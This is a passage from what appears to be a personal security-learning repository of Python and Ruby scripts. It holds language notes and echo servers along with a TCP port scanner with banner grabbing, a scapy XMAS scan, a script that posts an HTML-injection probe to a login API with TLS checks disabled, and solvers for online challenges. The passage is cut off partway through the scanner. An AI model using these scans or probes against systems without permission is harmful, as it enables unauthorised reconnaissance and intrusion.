names.map(&:upcase) # with & will coerce\n\n# CONSTANTS\n#\n# MAX_SPEED = 1000\n# # can modify constants\n# # with freeze cannot - runtime error thrown\n# TYPES = []\n# TYPES.freeze\n# TYPES << \"yo\"\n# # can't unfreeze, but can check to see if frozen\n# TYPES.frozen?\n#\n# # CONST within class can't be accessed outside without class and double colon, can't def const inside meth\n# class A; MIN_SPEED = 0; end\n# MIN_SPEED\n# A::MIN_SPEED\n# # can add another CONST to class the same way\n# A::MAX_SPEED = 100\n#\n# # MODULES\n# # all ApI related meth can go into api module\n# module API\n# def self.hatch_list # methods need to be added as module lvl methods - by prefixing with self\n# # ...\n# end\n# end\n#\n# hatches = API.hatch_list\n#\n# module SpaceStuff\n# class Spaceship\n# end\n# end\n#\n# ship = SpaceStuff::Spaceship.new # if classes can be accessed like any other CONST with scope operator\n\n# MIXIN\n# alt to multiple inheritance\n# instance methods become available as instance meth of the class\n\n# module AirControl\n# def measure_oxygen\n# #...\n# end\n# end\n#\n# class Spaceship\n# include AirControl\n# end\n#\n# ship = Spaceship.new\n# ship.measure_oxygen\n\n# instance methods in module become available as class methods\n# module Docking\n# def get_docking_params\n# #..\n# end\n# end\n#\n# class Spaceship\n# extend Docking\n# end\n#\n# Spaceship.get_docking_params" }, { 
"alpha_fraction": 0.5912806391716003, "alphanum_fraction": 0.6471389532089233, "avg_line_length": 21.96875, "blob_id": "60890406b31f59fb8af736861304a904eb48c161", "content_id": "3af0069043e34ff39dcbc73c5b43bf6f61e2950e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 734, "license_type": "no_license", "max_line_length": 86, "num_lines": 32, "path": "/ruby/request.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n# send a POST/data to an ip address/port\nrequire 'socket'\nrequire 'uri'\nrequire 'net/http'\nrequire 'openssl'\n#\n# buf = ''\n# num = rand(25-100) + 25\n# index = rand(num)\n#\n# num.times do\n# alpha = rand(127-7) + 7\n# buf += alpha.chr\n# end\n#\n# buffer = \"GET /api/v1/auth/login\" + buf\n# puts buffer\n#\n# s = UDPSocket.new\n# s.send(buffer,0,\"10.218.207.183\",80)\n\nuri = URI.parse(\"https://10.218.207.183\")\nhttp = Net::HTTP.new(uri.host, uri.port)\nhttp.use_ssl = true\nhttp.verify_mode = OpenSSL::SSL::VERIFY_NONE\nrequest = Net::HTTP::Post.new(\"/api/v1/auth/login\")\nrequest.body = {'credentials' => {'username' => '\"><h1>hi</h1>', 'password' => 'key'}}\nresponse = http.request(request)\n\nputs response.code\nputs response.body" }, { "alpha_fraction": 0.502196192741394, "alphanum_fraction": 0.5204977989196777, "avg_line_length": 31.267717361450195, "blob_id": "d837fdbe833b29acd0e570bba7e30a6f8857ca7d", "content_id": "81c7a110a4e6c59e6ee548ba23168cc13d0a58c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 4098, "license_type": "no_license", "max_line_length": 108, "num_lines": 127, "path": "/ruby/xrxxoxtxxa.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "require 'rest-client'\nrequire 'pp'\nrequire 'json'\n\n# Board Layout\n# [1][2][3]\n# [4][5][6]\n# [7][8][9]\n# - empty space\n# c computer piece\n# p player piece\n\nclass RxoxtxxaxAPI\n\n def initialize\n @base_url = 'https://rota.pxrxxaetxoxrxixxxan.com/rota/service/play.php'\n res = RestClient.get(\"#{@base_url}?request=new\")\n @cookies = res.cookies\n end\n\n def place(x)\n JSON.parse(RestClient.get(\"#{@base_url}?request=place&location=#{x}\", :cookies => @cookies))\n end\n\n def move(x, y)\n res = JSON.parse(RestClient.get(\"#{@base_url}?request=move&from=#{x}&to=#{y}\", :cookies => @cookies))\n end\n\n def status\n JSON.parse(RestClient.get(\"#{@base_url}?request=status\", :cookies => @cookies))\n end\n\n def reset\n res = RestClient.get(\"#{@base_url}?request=new\")\n @cookies = res.cookies\n JSON.parse(res)\n end\n\nend\n\n\npp @game = RxxoxtxaAPI.new\n\n# ideally would write code to check board \"---------\" to make sure player goes first\n# but ctrl-c up arrow Enter is our friend here 0_0\n\ndef gameloop()\n\n @game.reset\n\n # opening moves aren't correct or adjusted...just restart until AI chooses OUR ideal start\n # loop not running with a poor start - always reading success ..debug this later maybe\n\n @game.status[\"status\"] == \"success\" ? (pp @game.place(1)) : gameloop()\n @game.status[\"status\"] == \"success\" ? (pp @game.place(3)) : gameloop()\n @game.status[\"status\"] == \"success\" ? (pp @game.place(8)) : gameloop()\n\n # Algorithm? 
Shmalgorithm\n # roughly 5sec timeout - case is fast enough\n until @game.status[\"data\"].has_key?(\"hash\") do\n case @game.status[\"data\"][\"board\"]\n when \"p-p-c-cpc\",\"pcp---cpc\",\"pcp-c-cp-\",\"pcp-pcc--\",\"pcp--ccp-\",\"pcp-cc--p\",\"p-p-ccc-p\",\"p-p-cccp-\"\n pp @game.move(1,4)\n when \"pcpcc--p-\",\"pcpc---pc\",\"pcp-c--pc\",\"p-pcc--pc\",\"pcpcc-p--\",\"p-pcc-p-c\"\n pp @game.move(3,6)\n when \"p--ccp-pc\",\"p-cc-p-pc\",\"pc-cc--p-\",\"pc-ccp-p-\",\"p-cccp-p-\"\n pp @game.move(8,7)\n when \"pcpc-c-p-\"\n pp @game.move(8,5)\n when \"pcpcp---c\",\"c-pppcc--\"\n pp @game.move(5,8)\n when \"p-cc-ppc-\",\"p-cccpp--\",\"p-c-cppc-\"\n pp @game.move(1,2)\n when \"c-pp--cpc\",\"c-pp-cc-p\",\"-cpp-c-cp\",\"cp-p-c-cp\"\n pp @game.move(4,5)\n when \"pc--cp-pc\",\"pc---pcpc\",\"-c-pcpcp-\",\"---pcpcpc\"\n pp @game.move(6,3)\n when \"pc-c-pp-c\",\"p-c-cpp-c\",\"p--ccpp-c\",\"pcp-c-p-c\"\n pp @game.move(7,8)\n when \"-cppcc-p-\",\"--ppcccp-\",\"c-ppcc-p-\",\"c-ppcc-p-\",\"c-pp-ccp-\"\n pp @game.move(8,9)\n when \"-cppc--pc\",\"-cpp--cpc\",\"-cpp-cc-p\",\"-cppc-cp-\",\"-c-pcp-pc\"\n pp @game.move(4,1)\n when \"pc-c-ppc-\",\"pc-c-p-pc\",\"p-c--pcpc\"\n pp @game.move(1,5)\n when \"--ccpp-pc\",\"-cp-p-cpc\"\n pp @game.move(5,1)\n when \"-cpp-ccp-\"\n pp @game.move(3,5)\n when \"p-cc-pp-c\"\n pp @game.move(6,5),\"p-p-ccc-p\"\n when \"pc-cp-p-c\",\"c--ppccp-\",\"-c-pp-cpc\",\"c--ppcc-p\"\n pp @game.move(5,3)\n when \"pcp-c-c-p\",\"--ppccc-p\",\"-cppc-c-p\"\n pp @game.move(9,8)\n when \"-c--ppcpc\",\"-cp-pcc-p\",\"c-p-pc-cp\",\"cp--pc-cp\"\n pp @game.move(5,4)\n when \"p-ccp-pc-\"\n pp @game.move(5,6)\n when \"-pcc-ppc-\",\"cpc---pcp\",\"cpc--pp-c\"\n pp @game.move(7,5)\n when \"cpc-pp-c-\",\"-pccpp--c\",\"cpc-p--cp\"\n pp @game.move(5,7)\n when \"c-pp-c-cp\",\"c-ppcc--p\",\"c-ppc--cp\",\"c-ppc-c-p\"\n pp @game.move(3,2)\n when \"cp--cppc-\",\"-pc-cppc-\",\"cpc--ppc-\"\n pp @game.move(6,9)\n when \"--ccpppc-\"\n pp @game.move(5,2)\n when \"-pcc-pp-c\",\"-p-ccppc-\",\"-p-ccpp-c\",\"-pcccpp--\"\n pp @game.move(2,1)\n when \"cp-p-cc-p\",\"cp-pcc--p\",\"-p-pcc-cp\"\n pp @game.move(2,3)\n when \"cpc-c-p-p\",\"-pcc--pcp\",\"-pc-c-pcp\"\n pp @game.move(9,6)\n when \"cp---cpcp\",\"cp--c-pcp\"\n pp @game.move(7,4)\n when \"cpcp---cp\",\"cp-pc--cp\"\n pp @game.move(4,7)\n when \"cpcp--c-p\"\n pp @game.move(2,5)\n end\n end\n pp @game.status[\"data\"][\"hash\"]\nend\n\ngameloop()\n" }, { "alpha_fraction": 0.6178861856460571, "alphanum_fraction": 0.6536585092544556, "avg_line_length": 24.58333396911621, "blob_id": "56efa8a6a3e9a8187606d01cad64fce555806207", "content_id": "9ae48ebb356f99a403b23aaa0ed9a52944e1e27e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 615, "license_type": "no_license", "max_line_length": 117, "num_lines": 24, "path": "/python/mastermind.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "import requests, json\n\nemail = '[email protected]'\n\nr = requests.post('https://mastermind.praetorian.com/api-auth-token/', data={'email':email})\nr.json()\n\n# > {'Auth-Token': 'AUTH_TOKEN'}\nheaders = r.json()\nprint headers\n\n# Interacting with the game\nr = requests.get('https://mastermind.praetorian.com/level/1/', headers=headers)\nr.json()\n\n\n# pseudo\nwpns = [1,2,3,4,5,6]\nguess = [1,2,3,4]\n\n# > {'numGladiators': 4, 'numGuesses': 8, 'numRounds': 1, 'numWeapons': 6}\nr = requests.post('http://mastermind.praetorian.com/level/1/', data=json.dumps({'guess':[6,5,1,3]}), headers=headers)\nprint r.json()\n# > 
{'response': [2, 1]}\n\n" }, { "alpha_fraction": 0.6397219896316528, "alphanum_fraction": 0.6554498672485352, "avg_line_length": 19.704545974731445, "blob_id": "b0e1bf2133368d4b76d7eeef09a0c86f17667fa3", "content_id": "8a10bf5315d1bc6d1a51e393bae02889402b2f0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 2734, "license_type": "no_license", "max_line_length": 105, "num_lines": 132, "path": "/ruby/unixProcesses.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# # PROCESS ID - getpid(2)\n# puts Process.pid\n# # parent\n# puts Process.ppid\n#\n# # ENV var\n# ENV['MSG'] = 'wing it'\n# system \"echo $MSG\"\n\n# ARGUMENTS\n# many lib for args like optparse\n# if don't want to deal with overhead do something like\n# ARGV.include?('--help')\n\n# NAMING PROCESSES\n# rename current process\n# $PROGRAM_NAME = \"myproc\"\n\n# EXIT\n# Kernel#exit - exit - status code 0\n# at_exit {puts 'exiting'}\n# exit\n\n# Kernel#exit! - exit! - status code 1\n# at_exit line never invoked\n\n# Kernel#abort - generic unsuccessful exit - status code 1\n# at_exit {puts \"exited\"}\n# abort \"Something went wrong\"\n\n# FORK\n\n#CoW - copy on write\n# delays copying of memory until needs to be written\n\n# arr = [1,2,3]\n# fork do\n# # child initialized\n# # if using CoW this proc doesn't need to copy arr var\n# # bc we don't modify arr it shares memory with parent\n# p arr\n# end\n#\n# fork do\n# # arr var hasn't been copied bc of CoW\n# arr << 4\n# # modifies array, so copy needs to be made for this proc\n# # b4 it can be modified - array in parent remains un changed\n# end\n\n# fork do\n# 5.times do\n# sleep 1\n# puts \"I am an orphan\"\n# end\n# end\n#\n# Process.wait\n# abort \"Parent died\"\n\n# ceate 2 child proc\n# 2.times do\n# fork do\n# # rand sleep for each child\n# sleep rand(5)\n# end\n# end\n#\n# 2.times do\n# # wait for child proc to exit & print pid that gets returned\n# puts Process.wait\n# end\n\n# Process.wait2\n## can set exit code\n\n# 2.times do\n# fork do\n# if rand(5).even?\n# exit 110\n# else\n# exit 112\n# end\n# end\n# end\n#\n# 2.times do\n# # wait for each of child procs to exit\n# pid, status = Process.wait2\n#\n# # if proc exited with 110 we know even\n# if status.exitstatus == 110\n# puts \"#{pid} even #\"\n# else\n# puts \"#{pid} odd #\"\n# end\n# end\n\n# waitpid & waitpid2 wait for a specific child to exit determined by pid\n# fav = fork do\n# exit 77\n# end\n#\n# middle_child = fork do\n# abort \"wait!\"\n# end\n#\n# pid, status = Process.waitpid2 fav\n# puts status.exitstatus\n\n# Babysitting\n# parent forks childens then monitors them to ensure they are responsive\n\n# RACE CONDITIONS\n# create 2 childens - even if parent is slow at processing exited child it can always get exit child info\n# 2.times do\n# fork do\n# # both procs exit immed\n# abort \"finished\"\n# end\n# end\n#\n# # parent proc waits for the 1st proc then sleeps for 5 sec\n# # meanwhile 2nd child proc has exited and is no longer running\n# puts Process.wait\n# sleep 5\n#\n# # parent prc asks to wait once again, & 2nd proc's exit info\n# # has been queued up amazingly & is returned here\n# puts Process.wait\n#\n# # calling Process.wait when no child procs will raise Errno::ECHILD, KEEP TRACK of CHildens\n\n" }, { "alpha_fraction": 0.6739130616188049, "alphanum_fraction": 0.6992753744125366, "avg_line_length": 20.19230842590332, "blob_id": "261baa68b935386504496e05ffe1b1e969a66650", "content_id": 
"6e7381b534572ca89112c84076eb715b8e708d43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 62, "num_lines": 26, "path": "/python/Module-3/server.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport socket\n\ntcpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n# allow address to be re-used\ntcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\n\ntcpSocket.bind((\"0.0.0.0\",8000))\ntcpSocket.listen(2)\n\nprint \"Waiting for a Client ..\"\n(client, (ip, port)) = tcpSocket.accept()\n\nprint \"rcvd connection from : \", ip\nprint \"starting echo output ...\"\n\ndata = 'dummy'\n\nwhile len(data) :\n data = client.recv(2048)\n print \"Client sent: \",data\n client.send(data)\n\nprint \"closing connection ...\"\nclient.close()\n\n" }, { "alpha_fraction": 0.47826087474823, "alphanum_fraction": 0.5652173757553101, "avg_line_length": 22, "blob_id": "420e0b74e2ba350e90135f7a59723e6dea6b7c5b", "content_id": "2651447cb36becc1575251e05d4187ebcd478507", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/python/Module-2/signals.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n" }, { "alpha_fraction": 0.6520681381225586, "alphanum_fraction": 0.6569343209266663, "avg_line_length": 13.714285850524902, "blob_id": "2f6963b86a7b6af70667c40e9ae12c9207f38671", "content_id": "51f632d332b87bbd88ebc79fc6b990e4d2ab56db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 411, "license_type": "no_license", "max_line_length": 46, "num_lines": 28, "path": "/python/Module-2/files.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\n# write file\nfdesc = open(\"file.txt\", \"w\")\nfdesc.write(\"blah\")\n\n# append file\nfdesc = open(\"file.txt\", \"a\")\nfdesc.write(\"extra\")\n\n# close file\nfdesc.close()\n\n# read file\nfdesc = open(\"file.txt\", \"r\")\n\n# readlines\nfor line in fdesc.readlines():\n print(line.strip())\n\nimport os\nos.rename()\nos.delete()\n\n# EXERCISE\n# read /var/log/messages\n\n# find logs pertaining to USB & print them out" }, { "alpha_fraction": 0.689338207244873, "alphanum_fraction": 0.7022058963775635, "avg_line_length": 27.63157844543457, "blob_id": "00c6bdf6604796e9f7a7b5c5d285d9131c106057", "content_id": "1f4f835e41f886066077b8a518bc9a834331bef7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 544, "license_type": "no_license", "max_line_length": 90, "num_lines": 19, "path": "/python/Module-3/simplehttpserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\n\nimport SocketServer, SimpleHTTPServer\n\n\nclass HttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n # overwrite GET request\n def do_GET(self):\n if self.path == '/admin':\n self.wfile.write('This page is only for Admins!\\n')\n self.wfile.write(self.headers)\n else:\n SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)\n\n\nhttpServer = SocketServer.TCPServer(('',10001), SimpleHTTPServer.SimpleHTTPRequestHandler)\nhttpServer.serve_forever()\n" }, { "alpha_fraction": 0.5254378914833069, "alphanum_fraction": 
0.5396163463592529, "avg_line_length": 28.2439022064209, "blob_id": "8bac6eb9df70ca2c3a7b0ac991cb4d7e5f6a3e36", "content_id": "6b060a76ac19be2d86464353b934e0f2557bd14d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1199, "license_type": "no_license", "max_line_length": 94, "num_lines": 41, "path": "/ruby/ifconfig.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\n\n# an easier to view interface display \nrequire 'paint'\n\n# iterate through interfaces\n\ndef findInterfaces()\n if ARGV[0] == \"-v\"\n puts `ifconfig #{ARGV[1]} #{ARGV[2]}`\n else\n seq = 0..9\n en_container = []\n vmnet_container = []\n\n for num in seq\n en = `ifconfig en#{num} 2>/dev/null|grep -Po '(inet\\\\s|status:\\\\s)\\\\K[^\\\\s]*'`\n vmnet = `ifconfig vmnet#{num} 2>/dev/null|grep -Po '(inet\\\\s|status:\\\\s)\\\\K[^\\\\s]*'`\n str = en.split(\" \")\n status = str.pop\n ip = str.join(\"\\n\")\n newstatus = str.join(\" \")\n\n if en.size > 0 && status == \"active\"\n en_container << Paint[\"en#{num} - #{status}\", :green]\n en_container << Paint[\"#{ip}\", :white]\n elsif en.size > 0 && status == \"inactive\"\n en_container << Paint[\"en#{num} - #{status}\", \"#404040\"]\n en_container << ip if ip.size > 0\n end\n if vmnet.size > 0\n vmnet_container << Paint[\"vmnet#{num}\", :red]\n vmnet_container << Paint[\"#{vmnet.strip}\", :white]\n end\n end\n en_container.each{|interface|puts interface}\n vmnet_container.each{|interface| puts interface}\n end\nend\n\nfindInterfaces()\n" }, { "alpha_fraction": 0.5986193418502808, "alphanum_fraction": 0.6163707971572876, "avg_line_length": 20.125, "blob_id": "2cab8f94688b0b65b4bdcbd4332771139c182cc4", "content_id": "f47f7f92fc93780856f2a0d2c1d21b5054b0a5cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1014, "license_type": "no_license", "max_line_length": 62, "num_lines": 48, "path": "/python/Module-3/multiprocessechoserver.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n__author__ = 'ma11ock'\n\nimport os, socket, time\n\n\ntcpSocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n# allow address to be re-used\ntcpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)\ntcpSocket.bind((\"0.0.0.0\", 8000))\ntcpSocket.listen(2)\nprint \"Waiting for a Client ..\"\n\n\ndef echo_server():\n (client, (ip, port)) = tcpSocket.accept()\n\n childpid = os.fork()\n if childpid == 0:\n child_process()\n\n print \"rcvd connection from : \", ip\n print \"starting echo output ...\"\n time.sleep(2)\n data = 'dummy'\n\n while len(data):\n data = client.recv(2048)\n print \"pid is \", os.getpid()\n print ip, \" sent: \", data\n client.send(data)\n\n client.close()\n\n\ndef child_process():\n print(\"I am the child & my pid is: %d\" % os.getpid())\n echo_server()\n print(\"child is exiting\")\n\n\ndef parent_process():\n print(\"I am the parent & my pid is: %d\" % os.getpid())\n echo_server()\n print(\"parent is exiting\")\n\n\nparent_process()\n" }, { "alpha_fraction": 0.6187683343887329, "alphanum_fraction": 0.6302541494369507, "avg_line_length": 21.4780216217041, "blob_id": "885cb2728fbcafbb2b794bc548af4b6fcc3c420d", "content_id": "57662865e88fd6cc8b9702b2c9e86381a375762f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 4092, "license_type": "no_license", "max_line_length": 109, "num_lines": 182, "path": 
"/ruby/psFund/methods.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "# DEFAULT PARAMS\n# can include method calls or more logic\ndef produce_spaceship(type = :freighter, size = :xl)\n # ..\nend\n\ndef produce_spaceship(type = :freighter,\n size = calc_default_size(type))\n # ..\nend\n\ndef produce_spaceship(type = :freighter,\n size = (type == :freighter ? :xl : :m))\n # ..\nend\n=======\n# # VARIABLE LENGTH PARAM LISTS\n#\n# def produce_fleet(days_to_complete, *types)\n# #...\n# end\n#\n# produce_fleet(10,:freighter,:freighter,:explorer)\n# # could also call method with splat like this\n# ship_types = [:freighter,:freighter,:explorer]\n# produce_fleet(15,*ship_types)\n#\n# # KEYWORD ARGUMENTS\n#\n# produce_fleet(:freighter, :m, 100, 4)\n# produce_fleet(type: :freighter, size: :m,\n# fuel_tank_vol: 100,engine_cnt: 4)\n#\n# def produce_fleet(type: :freighter, size: :xl,\n# fuel_tank_vol: 400,engine_cnt: 4)\n# #...\n# end\n#\n# # can also be combined with reg param, as long as reg param comes first\n# def produce_fleet(type = :freighter, size: :xl)\n# #..\n# end\n#\n# def produce_spaceship(type = :freighter, size: m, **custom_components)\n#\n# components = {engine: :standard,\n# seats: :standard,\n# subwoofer: :none}\n#\n# components.merge!(custom_components)\n# #...\n# end\n#\n# produce_spaceship(:yacht, size: :s, engine: :rolls_royce, seats: :leather) # can replace custom components\n#\n# # METHOD ALIASING\n# # overriding the method but want to access old version\n# # if using super class can call super but if monkey patching need aliasing\n#\n# class String\n# def space_out\n# chars.join(\" \")\n# end\n#\n# # we want to change the string class by adding space out, but want to then add a modification to the size\n# # method to account for this change\n# # overrides method while retaining access to the original version\n# alias_method \"original_size\",\"size\"\n#\n# def size\n# original_size * 2 - 1\n# end\n# end\n#\n# puts \"abc\".spae_out\n# puts \"abc\".size\n\n# OPERATORS\n\nclass Spaceship\n attr_reader :name\n attr_reader :speed\n\n def initialize(name)\n @name = name\n @cargo = []\n @speed = 0\n @vessels = Hash.new { [] }\n end\n\n # passes type to vessels hash and returns wtv is stored at that key(type)\n def [](type)\n @vessels[type]\n end\n\n # get & set diff types of vessels stored in the space ship\n # returns a value that can appear on left side of assignment\n # takes an index and a value to set as args\n#\n# def []=(type,vehicles)\n# @vessels[type] = vehicles\n# end\n#\n# # allows me to put cargo onboard easily\n# def <<(cargo)\n# @cargo << cargo\n# end\n#\n# # spaceship operator compares 2 obj - rtn 0 if eq -1 if 1 < 2 and 1 if 1 > 2\n# def <=>(other)\n# name <=> other.name\n# end\n#\n# # unary + - used to inc dec ship's speed\n# def +@\n# @speed += 10\n# end\n#\n# def -@\n# @speed -= 10\n# end\n#\n# def !\n# puts \"self destruct sequence initiated\"\n# end\n#\n# end\n#\n# ship1 = Spaceship.new(\"shipper\")\n# ship2 = Spaceship.new(\"shippy\")\n# ship3 = Spaceship.new(\"shippyiest\")\n#\n# class Lander; end\n# ship1[:landers] = [Lander.new,Lander.new]\n# puts \"landers: #{ship1[:landers].inspect}\"\n#\n# class CargoPod; end\n# cargo_pod = CargoPod.new\n# ship1 << cargo_pod\n# p ship1\n#\n# p [ship1,ship2,ship3].sort.map{|ship|ship.name}\n#\n# +ship1\n# puts \"speed: #{ship1.speed}\"\n# -ship1\n# puts \"speed: #{ship1.speed}\"\n#\n# !ship1\n#\n# # won't work in boolean context anymore\n# if !ship1\n# puts \"ship isn't there\"\n# end\n#\n# # easy 
to get carried away with operator overload at expense of clarity - use sparingly when\n# # makes code MOAR readable\n\n# METHOD CALLS AS MESSAGES\n\n# case input\n# when :up_arrow then ship.up\n# when :down_arrow then ship.down\n# end\n#\n# handlers = {up_arrow: :up\n# down_arrow: :down}\n#\n# ship.send(handlers[input])\n# # or send msgs instead\n# ship.__send__(handlers[input])\n\n# METHODS OUTSIDE CLASSES\n\n# double\n# main -> self.class -> obj\n\n# METHOD MISSING\n\n# ship.xxyy -> NoMethodError\n\n# comes from method_missing - can override to provide more information for our use case\n\n" }, { "alpha_fraction": 0.569343090057373, "alphanum_fraction": 0.6204379796981812, "avg_line_length": 11.454545021057129, "blob_id": "9b7e34a414aa0e7ef3a3af8793b591d9d2630a9d", "content_id": "655bd46e4d66d4a09ad0bdf9cf515cc7e99b0012", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 137, "license_type": "no_license", "max_line_length": 29, "num_lines": 11, "path": "/python/Module-1/function.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "__author__ = 'ma11ock'\n\nimport sys\n\n\ndef print5times(line):\n\n for count in range(0, 5):\n print(line)\n\nprint5times(sys.argv[1])\n" }, { "alpha_fraction": 0.5368464589118958, "alphanum_fraction": 0.5380815267562866, "avg_line_length": 28.265060424804688, "blob_id": "1c885587a0cd1a2157fa90dd0e0b3984e20b1623", "content_id": "e8ec9ee05f5bfa17c701235bb5534bc50a63cf1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 2429, "license_type": "no_license", "max_line_length": 101, "num_lines": 83, "path": "/ruby/analyzer.rb", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/ruby\nclass Text\n attr_accessor :input\n\n def help\n puts 'for user input'\n puts '-u \"user input\"'\n puts 'for file input'\n puts '-f \"/path/to/file\"'\n exit\n end\n\n def user_input\n case ARGV[0]\n when \"-h\"\n help()\n when \"-u\"\n @input = ARGV[1]\n when \"-f\"\n begin\n @input = File.open(\"#{ARGV[1]}\",\"r\"){|x|x.readlines}\n @input = @input.map {|s| \"#{s}\" }.join(' ')\n rescue Exception => e\n puts e.message\n exit\n end\n else\n puts \"input error see help -h\"\n exit\n end\n end\n\n def characters\n char_cnt = @input.length\n char_without_spaces = @input.delete(' ').length\n puts \"There are #{char_cnt} characters in your data\"\n puts \"There are #{char_without_spaces} characters without spaces in your data\"\n end\n\n def lines\n linecnt = @input.split(\"\\n\").length\n puts linecnt.inspect\n puts \"There are #{linecnt} lines in your data\"\n end\n\n def words\n word_cnt = []\n words = @input.split(' ').each{|word| word_cnt<<word.length}\n words = word_cnt.inject(:+)\n puts \"There are #{words} words in your data\"\n end\n\n def averages\n # create sentences based on punctuation\n @sentence_cnt = @input.split(/[?,!,.]/)\n @paragraph_cnt = @input.split(\"\\n\")\n\n avg_words_per_sentence = lambda {\n words = @sentence_cnt.map{|word| word.split(' ')}\n num = []\n words.each{|word|num<<word.length}\n num.inject(:+) / @sentence_cnt.length\n }\n\n avg_sentence_per_block = lambda {\n sentences = @paragraph_cnt.map{|sentence| sentence.split('.')}\n num = []\n sentences.each{|sentence|num<<sentence.length}\n num.inject(:+) / @paragraph_cnt.length\n }\n puts \"There are #{@sentence_cnt.length} sentences in your data\"\n puts \"There are #{@paragraph_cnt.length} paragraphs in your data\"\n puts \"There is an average of 
#{avg_words_per_sentence.call} words per sentence in your data\"\n puts \"There is an average of #{avg_sentence_per_block.call} sentences per paragraph in your data\"\n end\nend\n\ntext = Text.new\ntext.user_input\ntext.characters\ntext.lines\ntext.words\ntext.averages\n" }, { "alpha_fraction": 0.630075216293335, "alphanum_fraction": 0.655639111995697, "avg_line_length": 24.576923370361328, "blob_id": "7e3794cf11011710a4b19b8826d88f9299a6a6fb", "content_id": "cacacad86048ed23afcd4cb12e850aae77f755ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 665, "license_type": "no_license", "max_line_length": 92, "num_lines": 26, "path": "/python/mock/xmascan.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#! /usr/bin/python\n\nimport sys\nfrom scapy.all import *\n# help\n\nprint './script ip port'\n\ndstip = sys.argv[1]\nsrc = RandShort()\ndstport=sys.argv[2]\nprint \"args - \" , sys.argv\nres = sr1(IP(dst=dstip)/TCP(dport=int(dstport),flags=\"FPU\"),timeout=10)\n\n# res.show() - need to catch for NoneType\n# port open - no resp\nif (str(type(res))==\"<type 'NoneType'>\"):\n print \"Open\"\n# rst pkt port is closed\nelif(res.haslayer(TCP)):\n if(res.getlayer(TCP).flags == 0x14):\n print \"Closed\"\n# icmp filtered maybe open or closed\nelif(res.haslayer(ICMP)):\n if(int(res.getlayer(ICMP).type)==3 and int(res.getlayer(ICMP).code) in [1,2,3,9,10,13]):\n print \"Filtered\"\n" }, { "alpha_fraction": 0.570155143737793, "alphanum_fraction": 0.5770881772041321, "avg_line_length": 28.134614944458008, "blob_id": "51b11e6ce9221e7cd6647718a512c45ba032a6f0", "content_id": "438755e610973b15c8f10d1fe3180b7b8522fc90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3029, "license_type": "no_license", "max_line_length": 127, "num_lines": 104, "path": "/python/Module-2/portscanner.py", "repo_name": "ma11ock/sec_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n__author__ = 'ma11ock'\n__version__ = '0.5' # major re-write cred to atomicmaster\n\nimport os, sys, argparse, socket, threading\n\nDEBUG = False\nif DEBUG:\n import pprint\n pp = pprint.PrettyPrinter(depth=6, indent=4)\n\n# we need this to make sure that multiple threads dont print to screen at the same time\nlock = threading.Semaphore(value=1)\n\n\n''' Define some functions '''\ndef check_port(host, port):\n if DEBUG:\n print 'trying ' + host + ':'+str(port)\n try:\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.settimeout(1)\n sock.connect((host, int(port)))\n # just for kicks, lets see if there is a banner we can grab\n sock.send(\"Knock Knock\\r\\n\")\n banner = sock.recv(1024)\n lock.acquire() # This way we are the only people printing to the console\n print '[+] %d/tcp open'% port\n if len(banner) > 0:\n print '[+] ' + str(banner)\n except:\n lock.acquire()\n #print '[-] %d/tcp closed'% port\n finally:\n lock.release()\n sock.close()\n return\n\ndef scan(host, ports):\n lock.acquire()\n print \"-\" * 60\n print \"Scanning: \", host\n print \"-\" * 60\n lock.release()\n\n threads = list()\n for port in 